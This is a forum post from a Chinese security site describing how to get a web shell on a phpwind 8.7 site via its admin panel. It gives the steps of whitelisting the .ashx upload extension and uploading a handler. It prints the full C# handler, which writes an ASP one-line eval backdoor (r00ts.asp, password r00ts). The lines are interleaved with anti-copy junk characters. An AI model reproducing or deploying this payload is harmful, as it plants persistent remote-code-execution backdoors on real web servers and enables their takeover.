找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2742|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
6 L8 }! X, W3 o& Y; X ; M3 `) g5 b* ?$ _8 ]5 U
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx/ b: N8 {! h8 _7 o

( X+ ]! D  Q/ c7 _发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整& G7 ?5 D- |9 ~! B2 U& n+ W
8 A1 T2 X6 P: D* {: K, b# C" W0 o
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
( g! A; i8 b. X) L, z4 F- ~4 X! _
0 F+ q2 }8 M3 A/ l7 ]9 D8 a打开之后空白 会在目录底下生成r00ts.asp 密码r00ts' a. |5 V0 v8 S4 O7 E- Q

+ E8 P3 {: C4 q# _; u下面是代码:
4 a# B7 P! G6 H 5 W3 v& N, h) }; @/ _
<%@ WebHandler Language="C#"Class="Handler" %>
* H. P1 }; R; z+ susing System;
7 e/ j9 n6 a6 d% ~' m5 husing System.Web;: a  Q, ^  k" N
using System.IO;
1 M' B1 R, M% Y! M: n: T3 Vpublic class Handler : IHttpHandler {* l+ a4 L/ r+ o
public void ProcessRequest (HttpContext context) {
0 {) _' u: q: q/ Ocontext.Response.ContentType = "text/plain";
* R- Y9 x& F8 t! k+ L* A1 gStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));9 E% S  m) P  A+ u, t2 f6 F4 K8 i
file1.Write("<%eval request(\"r00ts\")%>");, G! M9 \) `+ _/ F( t7 @& t/ c8 x
file1.Flush();4 ]0 Y- v  f4 R( ]* f7 r; w' `
file1.Close();4 y+ q: Y7 e* m5 l
}
5 O( \" h* j7 A& Cpublic bool IsReusable {% _7 Q/ U6 P- @5 |+ o) ^
get {4 y0 C* D4 a+ f+ s( u
return false;
9 I, D' z/ ~9 R( X; c  t3 N% H% O}
. U# g2 J( f" ^  m: e1 S4 _}' p8 `9 X# z. d7 k2 a4 L: a
}) y, y" l2 z/ h8 }4 ?+ h% \. w6 `: t6 h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表